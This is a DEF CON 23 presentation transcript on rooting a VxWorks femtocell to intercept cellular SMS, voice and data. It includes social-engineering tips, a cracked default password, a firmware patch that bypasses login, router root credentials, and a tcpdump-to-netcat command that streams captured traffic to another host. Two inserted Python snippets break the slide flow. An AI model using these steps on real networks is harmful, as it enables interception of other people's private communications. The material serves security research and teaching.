Transcript of DEF CON 23 Presentation

Hacking Femtocell
Build a free cellular traffic capture tool with a VxWorks based femtocell
Yuwei Zheng @DEF CON 23
Haoqi Shan @DEF CON 23
From: 360 Unicorn Team
Main contents
• About us
• Why do we need it
• How to get a free Femtocell
• Deeply Hack
• Capture packets
• Summary and Reference
About us
• 360 Unicorn Team
  • Radio & Hardware Security Research
  • Consists of a group of brilliant security researchers
  • Focus on the security of anything that uses radio technologies
    • RFID, NFC, WSN
    • GPS, UAV, Smart Cars, Telecom, SATCOM
• Our primary mission
  • Guarantee that Qihoo360 is not vulnerable to any wireless attack
  • Qihoo360 protects its users and we protect Qihoo360
• One of the Defcon 23 vendors
  • https://www.defcon.org/html/defcon-23/dc-23-vendors.html
About me
• Yuwei Zheng
  • a senior security researcher concentrating on embedded systems
  • reversed the BlackBerry BBM, PIN and BIS push mail protocols
  • decrypted the RIM network stream successfully in 2011
  • finished a MITM attack against BlackBerry BES
• Haoqi Shan
  • a wireless/radio security researcher in Unicorn Team
  • obtained a bachelor's degree in electronic engineering in 2015
  • focuses on Wi-Fi penetration, GSM systems, router/switch hacking
Why do we need it
• Research on products with an integrated cellular modem
• Capture and hijack
  • SMS
  • Voice
  • Data traffic
Why not a software-based GSM base station
• OpenBTS
• USRP
• GNU Radio
• Why not?
  • Data traffic hijack
  • Access denied to operator core network
  • NO real uplink & downlink SMS hijack
Femtocell’s advantages
• Access to network operator
• What a hacked Femtocell can do
  • SMS and Data traffic
    • Capture
    • Hijack
    • Modify
  • Even more…
    • Roaming in operator’s network
Use Femtocell in research
• Cellular modem integrated devices
  • Capture or modify control commands
    • SMS
    • 2G
  • Capture or modify circle data
    • SMS
    • 2G
• Trusted data link?
  • Find your system vulnerability
How to get a free Femtocell
• Can’t be bought?
• Social engineering
  • Complain to Customer Service
    • Bad network signal
    • Again and again
  • Make a complaint to management
  • Finally: “Sir, we will set up a femtocell in your home, I hope this device can make your network signal better.”
Let’s hack it
• Inside the femtocell
  • Home NodeB
  • Router with Wi-Fi
    • 1 WAN port
    • 2 LAN ports
• Router configuration page IP
  • 192.168.197.1
• Home NodeB configuration page IP
  • 192.168.197.241
Quick and simple port scan
• nmap -sT -sU 192.168.197.241
Try to log in
• Try telnet/ftp/http/tftp
• Seems like VxWorks OS
• Wrong password again and again?
  • Longer and longer delay before the prompt shows up
  • Forget about brute force
Err… it’s VxWorks…
• VxWorks
  • a real-time operating system developed as proprietary software
  • designed for use in embedded systems requiring real-time, safety and security certification
  • for industries such as aerospace and defense, medical devices, industrial equipment
• Notable uses
  • The Mars Reconnaissance Orbiter
  • Northrop Grumman X-47B Unmanned Combat Air System
  • Apple AirPort Extreme
• Proprietary software
• Well, seems much harder to hack than a Linux-based Femtocell
wdbrpc (dump memory)
• VxWorks system debug interface
• Exploit in Metasploit by H.D. Moore
• Failed in use
wdbrpc (scan version)
• Scanner in Metasploit by H.D. Moore
• Repaired
Dismantling the hardware
• Home NodeB
  • OMAPL138E
    • DSP
    • ARM9
  • FPGA
• Router
  • AR9341
    • Router
    • Wi-Fi AP
Find the UART interface
• Hmmm… easy!
Use the gift
• Interrupt the boot process
• Get more useful information
Play with bootshell
Bootparm
• Use `p' to show the boot parameters
What’s inside
What’s inside
• tffs0
• Directory Structure
  • common
    • configuration file
  • user1
    • running version VxWorks system and apps
  • user2
    • last version VxWorks system and apps
  • wlanBackup
    • router firmware backup files
Download the firmware
• use tftp port
• Where is it?
  • `cp'
  • `tftp get'
  • One by one
Analyze the firmware
• use `cp' command
  • cp /tffs0/user1/mpcs.Z host:/ftpforvx/user1/mpcs.Z
  • cp /tffs0/blabla host:/blabla
• load kernel by command `l'
  • mpcs.Z base address 0xc010000
Deflate the kernel image
• mpcs.Z
  • 《Understanding the bootrom image》
  • VxWorks compressed by deflate?
• WindRiver deflate header
  • Head magic 05 15 01 00, 4 bytes
  • Length, 4 bytes
  • Flag 08, 1 byte
• Skip the first 9 bytes, zlib-flate it!
Deflate the kernel image
• dd if=./mpcs.Z of=./mpcs.deflate ibs=1 obs=1 skip=9
• zlib-flate -uncompress < mpcs.deflate > mpcs.out
• strings mpcs.out | grep -i "copyright"
• Success!
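The dd/zlib-flate pipeline above, as an added example (not code from the talk): a small Python unwrapper that validates the 9-byte WindRiver header the previous slide describes (magic 05 15 01 00, 4-byte length, flag 08), inflates the payload, and runs the same "copyright" sanity check. The byte order of the length field and that it counts the compressed payload are assumptions not stated on the slide, so a mismatch only warns; the sample image and its copyright string are constructed here.

```python
import struct
import zlib

# Header layout from the slide: 4-byte magic, 4-byte length, 1-byte flag,
# then the compressed stream (the slide's "skip the first 9 bytes").
WR_MAGIC = b"\x05\x15\x01\x00"
WR_FLAG = 0x08
WR_HEADER_LEN = 9


def parse_wr_header(image: bytes) -> dict:
    """Validate the 9-byte header and return its fields.

    Assumption (not on the slide): the length field is little-endian and
    counts the compressed payload bytes that follow the header.
    """
    if len(image) < WR_HEADER_LEN:
        raise ValueError("image shorter than the 9-byte header")
    magic = image[:4]
    if magic != WR_MAGIC:
        raise ValueError(f"bad magic {magic.hex()}, expected {WR_MAGIC.hex()}")
    (length,) = struct.unpack("<I", image[4:8])
    flag = image[8]
    if flag != WR_FLAG:
        raise ValueError(f"unexpected flag 0x{flag:02x}, expected 0x{WR_FLAG:02x}")
    return {"magic": magic, "length": length, "flag": flag}


def is_wr_image(image: bytes) -> bool:
    """True when the header parses; handy for triaging unknown blobs."""
    try:
        parse_wr_header(image)
        return True
    except ValueError:
        return False


def unwrap_kernel(image: bytes) -> bytes:
    """Strip the header and inflate the payload (dd skip=9 + zlib-flate)."""
    hdr = parse_wr_header(image)
    payload = image[WR_HEADER_LEN:]
    if hdr["length"] != len(payload):
        # Only warn: the exact meaning of the length field is an assumption.
        print(f"warning: header length {hdr['length']} != payload {len(payload)}")
    try:
        return zlib.decompress(payload)          # zlib-wrapped stream
    except zlib.error:
        return zlib.decompress(payload, -zlib.MAX_WBITS)  # raw deflate fallback


def has_copyright_string(blob: bytes) -> bool:
    """Mirror the slide's `strings | grep -i copyright` sanity check."""
    return b"copyright" in blob.lower()


def build_sample_image(kernel: bytes) -> bytes:
    """Wrap a blob in the slide's header format (constructed test data)."""
    payload = zlib.compress(kernel)
    return WR_MAGIC + struct.pack("<I", len(payload)) + bytes([WR_FLAG]) + payload


# Constructed stand-in for mpcs.Z: padding around a copyright-style string.
SAMPLE_KERNEL = b"\x00" * 64 + b"VxWorks sample: Copyright (constructed)" + b"\xff" * 64
SAMPLE_IMAGE = build_sample_image(SAMPLE_KERNEL)

if __name__ == "__main__":
    kernel = unwrap_kernel(SAMPLE_IMAGE)
    print(len(kernel), "bytes, copyright string found:", has_copyright_string(kernel))
```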
Recover the login password
• Login init process
  • user name
  • password hash
Recover the login password
• Crack the password hash
  • 73l8gRjwLftklgfdXT+MdiMEjJwGPVMsyVxe16iYpk8=
• Base64 encoded?
  • EF797C8118F02DFB649607DD5D3F8C7623048C9C063D532CC95C5ED7A898A64F
• I’m feeling lucky
  • http://www.hashkiller.co.uk/
  • SHA256
  • 12345678
• Always try 88888888 / 12345678 first!
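An offline version of the check on this slide, as an added example and not code from the talk: base64-decode the stored value, confirm it is a raw 32-byte digest, and compare it against the two defaults the slide names, which is the check a firmware audit runs to flag a shipped default credential. That the stored value is an unsalted SHA-256 digest is inferred from the slide; KNOWN_DEFAULTS is a hypothetical list holding only the values the slide gives.

```python
import base64
import hashlib

# Stored credential value from the slide (base64 of the raw SHA-256 digest).
STORED_HASH_B64 = "73l8gRjwLftklgfdXT+MdiMEjJwGPVMsyVxe16iYpk8="

# Defaults the slide says to try first (hypothetical list; a real audit
# would load a fuller vendor-default list here).
KNOWN_DEFAULTS = ["88888888", "12345678"]


def decode_stored_hash(b64: str) -> str:
    """Base64-decode the stored value and return the digest as upper-case hex.

    Rejects values that are not exactly one SHA-256 digest long, so a
    salted or differently hashed credential is reported instead of mis-read.
    """
    raw = base64.b64decode(b64, validate=True)
    if len(raw) != hashlib.sha256().digest_size:
        raise ValueError(f"{len(raw)} bytes is not a SHA-256 digest")
    return raw.hex().upper()


def find_default_credential(b64: str, candidates=KNOWN_DEFAULTS):
    """Return the known default whose unsalted SHA-256 matches, else None."""
    target = decode_stored_hash(b64)
    for pw in candidates:
        if hashlib.sha256(pw.encode()).hexdigest().upper() == target:
            return pw
    return None


if __name__ == "__main__":
    print(decode_stored_hash(STORED_HASH_B64))
    print("matches known default:", find_default_credential(STORED_HASH_B64))
```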
Patch it
• Not a weak password?
• Find the authentication function
Patch it
• Bypass login process
  • patch the firmware
  • zlib compress it
  • add VxWorks header number
  • download file by ftp
• Hot patch
  • Boot shell
    • `l' command: unzip and load mpcs.Z
    • `m' command: patch
      • 0xc0574d64
      • DF FF FF 0A -> DF FF FF EA
      • BEQ loc_C0574CE8 -> B loc_C0574CE8
VxWorks kernel shell
• Log in then debug the kernel
• Lots of tools
  • Debug it!
    • `func'
  • Modify it!
    • `mem'
Capture data packets
• Forward
  • telnet router
    • root:5up
  • tcpdump -n -i br0 -s 0 -w - host not 192.168.197.104 | netcat 192.168.197.104 9527 &
  • nc -l -v -p 9527 >> sms.pcap
• Listen
  • mirror router port
  • wireshark
  • real-time
Capture data packets
Encrypted?
• Read log file, IPsec?
• Find the encryption key and authentication key
Fix protocol port
• IPsec runs on non-standard ports, so map them back to the right dissectors
  • 500 -> 60295 ISAKMP
  • 4500 -> 60296 UDPENCAP
Now decrypt it
• Edit ESP SAs
• Add uplink and downlink SAs separately
Wrong protocol
• Iu-h protocol?
Find the answer
• Reverse GSM board firmware
Rebuild Wireshark
• Write our own dissector?
  • Complicated…
    • ASN.1
    • RUA
    • RANAP
    • Blablabla…
• Analyze packets byte by byte
• Fix the Wireshark dissector rules
• Rebuild it!
• Voilà
Capture SMS
Capture voice
Capture GPRS data
Capture GPRS data
Capture your email
Summary and References
• Summary
  • VxWorks is not easy to hack
  • More mining, more fun
  • Wanna know more? Feel free to contact us
• References
  • Traffic Interception and Remote Mobile Phone Cloning with a Compromised CDMA Femtocell - https://www.nccgroup.trust/globalassets/newsroom/us/blog/documents/2013/femtocell.pdf
  • VxWorks Command-Line Tools User's Guide - http://88.198.249.35/d/VxWorks-Application-Programmer-s-Guide-6-6.pdf
  • VxWorks Application Programmer's Guide, 6.6 - http://read.pudn.com/downloads149/ebook/646091/vxworks_application_programmers_guide_6.6.pdf